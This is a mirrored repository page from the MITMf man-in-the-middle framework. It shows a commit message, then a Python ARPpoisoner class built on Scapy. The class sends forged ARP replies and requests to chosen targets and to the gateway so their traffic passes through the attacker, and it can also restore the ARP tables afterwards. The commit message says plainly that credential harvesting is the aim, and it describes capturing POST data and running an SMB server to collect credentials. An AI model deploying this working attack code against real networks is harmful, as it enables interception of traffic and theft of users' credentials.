mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-05 20:42:20 -07:00
9712eed4a3
I've re-written a decent amount of the framework to support dynamic config file updates, revamped the ARP Spoofing 'engine' and changed the way MITMf integrates Responder and Netcreds. - Net-creds is now started by default and no longer a plugin.. It's all about getting those creds after all. - Integrated the Subterfuge Framework's ARPWatch script, it will enable itself when spoofing the whole subnet (also squashed bugs in the original ARP spoofing code) - The spoof plugin now supports specifying a range of targets (e.g. --target 10.10.10.1-15) and multiple targets (e.g. --target 10.10.10.1,10.10.10.2) - An SMB Server is now started by default, MITMf now uses Impacket's SMBserver as supposed to the one built into Responder, mainly for 2 reasons: 1) Impacket is moving towards SMB2 support and is actively developed 2) Impacket's SMB server is fully functional as supposed to Responder's (will be adding a section for it in the config file) 3) Responder's SMB server was unrealiable when used through MITMf (After spending a day trying to figure out why, I just gave up and yanked it out) - Responder's code has been broken down into single importable classes (way easier to manage and read, ugh!) - Started adding dynamic config support to Responder's code and changed the logging messages to be a bit more readable. - POST data captured through the proxy will now only be logged and printed to STDOUT when it's decodable to UTF-8 (this prevents logging encrypted data which is no use) - Responder and the Beefapi script are no longer submodules (they seem to be a pain to package, so i removed them to help a brother out) - Some plugins are missing because I'm currently re-writing them, will be added later - Main plugin class now inharates from the ConfigWatcher class, this way plugins will support dynamic configs natively! \o/
148 lines
6.4 KiB
Python
148 lines
6.4 KiB
Python
import logging
|
|
import threading
|
|
from time import sleep
|
|
from scapy.all import *
|
|
|
|
mitmf_logger = logging.getLogger('mitmf')
|
|
|
|
class ARPpoisoner():
|
|
|
|
def __init__(self, gateway, interface, mac, targets):
|
|
|
|
self.gatewayip = gateway
|
|
self.gatewaymac = getmacbyip(gateway)
|
|
self.mymac = mac
|
|
self.targets = self.getTargetRange(targets)
|
|
self.targetmac = None
|
|
self.interface = interface
|
|
self.arpmode = 'rep'
|
|
self.debug = False
|
|
self.send = True
|
|
self.interval = 3
|
|
|
|
def getTargetRange(self, targets):
|
|
if targets is None:
|
|
return None
|
|
|
|
targetList = list()
|
|
targets = targets.split(",")
|
|
for target in targets:
|
|
if "-" in target:
|
|
max_range = int(target.split("-")[1])
|
|
octets = target.split("-")[0].split(".")
|
|
f3_octets = ".".join(octets[0:3])
|
|
l_octet = int(octets[3])
|
|
|
|
for ip in xrange(l_octet, max_range+1):
|
|
targetList.append('{}.{}'.format(f3_octets, ip))
|
|
else:
|
|
targetList.append(target)
|
|
|
|
return targetList
|
|
|
|
def start(self):
|
|
if self.gatewaymac is None:
|
|
sys.exit("[ARPpoisoner] Error: Could not resolve gateway's MAC address")
|
|
|
|
mitmf_logger.debug("[ARPpoisoner] gatewayip => {}".format(self.gatewayip))
|
|
mitmf_logger.debug("[ARPpoisoner] gatewaymac => {}".format(self.gatewaymac))
|
|
mitmf_logger.debug("[ARPpoisoner] targets => {}".format(self.targets))
|
|
mitmf_logger.debug("[ARPpoisoner] targetmac => {}".format(self.targetmac))
|
|
mitmf_logger.debug("[ARPpoisoner] mymac => {}".format(self.mymac))
|
|
mitmf_logger.debug("[ARPpoisoner] interface => {}".format(self.interface))
|
|
mitmf_logger.debug("[ARPpoisoner] arpmode => {}".format(self.arpmode))
|
|
mitmf_logger.debug("[ARPpoisoner] interval => {}".format(self.interval))
|
|
|
|
if self.arpmode == 'rep':
|
|
t = threading.Thread(name='ARPpoisoner-rep', target=self.poisonARPrep)
|
|
|
|
elif self.arpmode == 'req':
|
|
t = threading.Thread(name='ARPpoisoner-req', target=self.poisonARPreq)
|
|
|
|
t.setDaemon(True)
|
|
t.start()
|
|
|
|
def stop(self):
|
|
self.send = False
|
|
sleep(3)
|
|
self.interval = 1
|
|
|
|
if self.targets:
|
|
self.restoreTarget(2)
|
|
|
|
elif self.targets is None:
|
|
self.restoreNet(5)
|
|
|
|
def poisonARPrep(self):
|
|
while self.send:
|
|
|
|
if self.targets is None:
|
|
pkt = Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op="is-at")
|
|
sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2
|
|
|
|
elif self.targets:
|
|
#Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it
|
|
for targetip in self.targets:
|
|
try:
|
|
targetmac = getmacbyip(targetip)
|
|
|
|
if targetmac is None:
|
|
mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
|
|
|
|
elif targetmac:
|
|
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug)
|
|
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
|
|
|
|
except Exception, e:
|
|
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
|
|
pass
|
|
|
|
sleep(self.interval)
|
|
|
|
def poisonARPreq(self):
|
|
while self.send:
|
|
|
|
if self.targets is None:
|
|
pkt = Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op="who-has")
|
|
sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2
|
|
|
|
elif self.targets:
|
|
for targetip in self.targets:
|
|
try:
|
|
targetmac = getmacbyip(targetip)
|
|
|
|
if targetmac is None:
|
|
mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
|
|
|
|
elif targetmac:
|
|
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug)
|
|
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug)
|
|
|
|
except Exception, e:
|
|
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
|
|
pass
|
|
|
|
sleep(self.interval)
|
|
|
|
def restoreNet(self, count):
|
|
mitmf_logger.info("[ARPpoisoner] Restoring subnet connection with {} packets".format(count))
|
|
pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.gatewaymac, psrc=self.gatewayip, op="is-at")
|
|
sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2
|
|
|
|
def restoreTarget(self, count):
|
|
for targetip in self.targets:
|
|
try:
|
|
targetmac = getmacbyip(targetip)
|
|
|
|
if targetmac is None:
|
|
mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
|
|
|
|
elif targetmac:
|
|
mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
|
|
|
|
send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug)
|
|
send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
|
|
|
|
except Exception, e:
|
|
mitmf_logger.error("[ARPpoisoner] Exception occurred while restoring connection {}: {}".format(targetip, e))
|
|
pass
|